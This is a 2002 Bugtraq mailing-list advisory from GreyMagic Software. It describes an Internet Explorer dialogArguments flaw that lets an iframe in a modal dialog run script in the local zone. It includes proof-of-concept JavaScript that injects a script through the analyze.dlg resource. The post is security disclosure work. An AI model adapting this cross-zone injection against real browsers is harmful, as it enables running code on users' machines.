Bugtraq mailing list archives

RE: (MSIE) -"dialogArguments" (extended)


From: "GreyMagic Software" <security () greymagic com>
Date: Wed, 20 Nov 2002 10:55:17 +0200

IFRAME in a page opened by "openModalDialog" has "dialogArguments" of its
parent.

The method is "showModalDialog" and not "openModalDialog". It's worth noting
that "showModelessDialog" is also vulnerable.

/*note: please tell me if "MSIE SP1" allows an internet page to contain an
iframe with local content*/

Normally, it doesn't. But it seems like Microsoft applied that rule to
normal windows and forgot to do the same for dialogs.

In the demo:
(*) "victim zone" is the local zone;
(*) the page from the victim zone is "res://shdoclc.dll/privacypolicy.dlg"; it
uses "cookieUrl" without filtering.

This vulnerability is very similar to the redirect vulnerability in dialogs
presented by Thor Larholm back in March and it has the same impact. But just
like Larholm's initial advisory was confined to IE 6, Liu's is confined to
IE 6 as well. This is a result of using "privacypolicy.dlg" for
exploitation, which was not shipped prior to version 6.

However, IE 5.5 is also vulnerable, and can be exploited by using the
"analyze.dlg" resource, which we published immediately after Thor's advisory
at the time.

Notice that IE 5.0 is not vulnerable to this flaw at all. It seems like many
of the recent IE vulnerabilities emerge from the global change made to
windows (including frames and iframes) in IE 5.5.

The following proof-of-concept code will work on both (fully patched) IE 5.5
and IE 6:

/*
Online demonstration at
http://security.greymagic.com/misc/globalDgArg/
*/

function oExploit(iSec) {
        return {
                rel:"stylesheet",
                readyState:"exploit",
                href:sHTML
        };
}
oExploit.length=1;

var sHTML="<scr\ipt defer>alert(location.href)</scr\ipt>",
        oSecurity={
                document:{
                        all:{
                                tags:function (sTag) {
                                        return sTag=="link" ? oExploit : [];
                                }
                        }
                }
        }

// base.html contains <iframe src="res://shdoclc.dll/analyze.dlg"></iframe>
showModalDialog("base.html",oSecurity);

